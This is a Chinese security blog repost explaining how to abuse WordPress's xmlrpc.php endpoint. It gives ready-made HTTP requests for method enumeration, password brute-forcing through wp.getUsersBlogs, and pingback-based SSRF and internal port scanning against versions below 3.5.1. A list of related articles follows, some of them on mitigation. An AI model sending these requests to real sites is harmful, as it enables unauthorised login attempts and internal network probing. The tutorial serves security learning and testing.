WordPress xmlrpc.php 漏洞利用

最新推荐文章于 2024-09-09 09:30:17 发布
最新推荐文章于 2024-09-09 09:30:17 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web 文章标签: php 开发语言
原文链接:https://www.jianshu.com/p/42e3b065ad76
版权

原文链接:https://www.jianshu.com/p/42e3b065ad76

WordPress xmlrpc.php 漏洞利用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qUMWROU3-1673359175640)(https://upload.jianshu.io/users/upload_avatars/17638197/8ba0fd01-d4b3-40f5-9eac-1af427b0b305?imageMogr2/auto-orient/strip|imageView2/1/w/96/h/96/format/webp)]

wh1te8ea关注IP属地: 西藏

0.0722020.05.17 22:22:19字数 406阅读 7,345

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。

0X01 激活XML-RPC

从3.5版本开始,XML-RPC功能默认开启。 早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.

路径:http://example.com/wordpress/xmlrpc.php

img

image.png

0x02 查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

img

image.png

0x03 账号爆破

一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。
构造请求包:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

img

image.png

爆破成功会返回博客的内容:

img

image.png

0x03 SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
构造请求包:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

IP和端口存在,返回包中的中的值大于0:

img

image.png

利用脚本:
https://github.com/FireFart/WordpressPingbackPortScanner

0x04 读取文件:

img

image.png

img

image.png

0x99 参考:

https://codex.wordpress.org/zh-cn:XML-RPC_Support
http://xmlrpc.com/
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

【网络安全】XML-RPC PHP WordPress漏洞
等风来
08-27 550
本文将解释xmlrpc.php WordPress 漏洞及利用方式,并以三种攻击方法进行阐发:1、用户名枚举。2、跨站点端口攻击 (XSPA) 或端口扫描。3、使用 xmlrpc.php 进行暴力攻击。
xmlrpc.php 漏洞利用
墨痕诉清风的博客
10-10 8121
WordPress采用了接口.并且通过内置函数实现了该接口内容。所以,你可要通过客户端来管理Wordpress。通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端来发布你的WordPress日志和页面。同时,XML-RPC 也可使用插件来自定义你的规则。
WordPress XML-RPC PHP 客户端使用教程
最新发布
gitblog_01134的博客
09-09 490
WordPress XML-RPC PHP 客户端使用教程 wordpress-xmlrpc-clientA PHP XML-RPC client for Wordpress websites项目地址:https://gitcode.com/gh_mirrors/wo/wordpress-xmlrpc-client 1. 项目介绍 Wordpress-xmlrpc-client 是一个用于 Wo...
WordPress XMLRPC安全漏洞
maverickpig的博客
01-23 4861
wordpress xmlrpc安全漏洞
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1401
网络安全自学日志-漏洞复现篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人复现笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
Wordpress xmlrpc.php暴力破解漏洞
weixin_33929309的博客
08-02 1179
2019独角兽企业重金招聘Python工程师标准>>> ...
WordPressxmlrpc.php完整指南(功能、安全风险、如何禁用)
06-18 2000
XML-RPC是支持WordPress与其他系统之间通信的规范。它通过使用HTTP作为传输机制和XML作为编码机制来标准化这些通信来实现此目的。XML-RPC早于WordPress:它出现在b2博客软件中,该软件于2003年创建了WordPress。该系统的代码存储在站点根目录下的xmlrpc.php文件中。即使XML-RPC在很大程度上已经过时,它仍然存在。在WordPress的早期版本中,默认情况下已关闭XML-RPC。但是从3.5版开始,默认情况下已启用它。
复现WordPress xmlrpc.php漏洞和SSRF
记录并分享学习安全的知识点..
04-02 2028
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为 它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定UR...
WordPress xmlrpc.php SSRF漏洞复现
god_Zeo的安全博客
11-23 3784
0x01 WordPress xmlrpc.php 存在SSRF漏洞 通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。 0x02影响版本 WordPress 版本< 3.5.1 造成的影响 1、可以对业务内网进行探测。 2、攻击运行在内网或本地的应用程序(比如溢出攻击)。 3、利用file协议读取本地文件等 0x03漏洞验证 第一步:直接访问这个文件,初步判断 第二步:发现POC验证数据包 需要修改三处地方:例如:w
针对WordPressxmlrpc.php暴力破解攻防
秋̶᭄ꦿ攻城狮࿆ྂ
04-02 1905
绪论 通常wordpress登录接口都是做了防暴力破解防护的,利用xmlrpc.php提供的接口尝试猜解用户的密码,可以绕过wordpress对暴力破解的限制。xmlrpc.php或可导致拒绝服务 利用原理 Pingback 是三种类型的反向链接中的一种,当有人链接或者盗用作者文章时来通知作者的一种方法。可以让作者了解和跟踪文章被链接或被转载的情况。一些全球最受欢迎的 blog 系统,都支持 Pi...
xmlrpc.php 漏洞修复,CVE-2014-3668,CNNVD-201410-1339|PHP XMLRPC扩展缓冲区溢出漏洞 - 信息安全漏洞门户 VULHUB...
weixin_29055137的博客
03-26 381
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。XMLRPC是其中的一个用于实现XML-RPC协议的库。 PHP XMLRPC扩展中的libxmlrpc/xmlrpc.c脚本中mkgmtime实现过程中的‘date_from_ISO8...
wordpress漏洞_实战Wordpres的CSRF漏洞利用
weixin_39575212的博客
12-12 404
Wordpress简介Wordpress是使用PHP语言开发的博客平台,用户可以在支持PHP和,MySQL数据库的服务器上架设属于自己的网站,也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理软件,他是使用PHP和MySQL数据库开发的。安装WordPress环境1、 下载wordpress压缩包,解压到phpstudy的...
wordpress xmlrpc.php 漏洞,[分享]WordPress xmlrpc.php 被不断请求导致CPU爆表 解决方法 | 霸王硬上弓's Blog...
weixin_29955195的博客
03-10 600
最近服务器的CPU总是爆满,通过日志文件发现大量来自国外的IP疯狂请求 xmlrpc.php 这个文件。通过查询,该文件的作用如下:WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理WordpressWordPress 同时也支持如下几种API:Blogger API, metaWeblog API, Mova...
WordPress最新网站漏洞利用及修复解决方案
w3cschools的博客
09-04 2396
WordPress最新版本存在远程代码注入获取SHELL漏洞,在2019年,该网站漏洞影响的版本是WordPress5.0,甚至是致命的一个漏洞,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本,可以删除网站上的任意文件,影响危害严重。漏洞的产生是因为image图片模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功,如果被攻击者利用,...
php xmlrpc
yihaoxue的博客
01-16 283
Web Service就是为了异构系统的通信而产生的,它基本的思想就是使用基于XML的HTTP的远程调用提供一种标准的机制,而省去建立一种新协议的需求。目前进行Web Service通信有两种协议标准,一种是XML-RPC,另外一种是SOAP。XML-RPC比较简单,出现时间比较早,SOAP比较复杂,主要是一些需要稳定、健壮、安全并且复杂交互的时候使用。PHP中集成了XML-RPC和SOAP两...
解决WordPress网站被利用xmlrpc.php文件攻击问题
weixin_33923148的博客
01-03 1413
原因在于使用的WORDPRESS程序默认xmlrpc.php开启,而被用来DDOS攻击导致占用资源过高。 如何解决这个问题呢? 是屏蔽 XML-RPC (pingback) 的功能。 add_filter('xmlrpc_enabled', '__return_false'); 转载于:https://www.cnblogs.com/xiaobingch/p/10217602....
WordPress网站大量xmlrpc.php请求,解决办法
ts小陈的博客
01-29 673
昨天发现大量404请求,于是发现全部为cron,可看这篇文章《昨晚解决后,今天再次查看日志发现正常了,但是出现了大量POST请求xmlrpc.php,这些人都没事干没事扫我这小破站干啥。直接访问提示如下。
wordpress 注入恶意代码漏洞利用与修复方案
网站安全资讯
09-16 1039
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
xmlrpc.php 漏洞
06-01
XML-RPC 是一种远程过程调用(RPC)协议,它使用 XML 来编码其调用和响应消息。XML-RPC 协议中的一个漏洞xmlrpc.php 漏洞,这是一种常见的 Web 应用程序漏洞。 攻击者可以利用这个漏洞,将恶意代码注入到 xmlrpc.php 文件中,然后通过远程调用来执行这些恶意代码,从而获得对系统的控制权。攻击者可以使用这个漏洞来进行各种攻击,如代码执行、文件读取、SQL 注入、拒绝服务等。 要防止 xmlrpc.php 漏洞,应该采取以下措施: 1. 禁用 xmlrpc.php 文件,或者限制其访问权限。 2. 更新 Web 应用程序到最新版本,以修复潜在的漏洞。 3. 使用防火墙,限制对 xmlrpc.php 文件的访问。 4. 使用安全插件,如 Wordfence,以检测和防止攻击。 总之,保持 Web 应用程序的安全性是非常重要的,应该采取适当的措施来防止 xmlrpc.php 漏洞和其他潜在的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值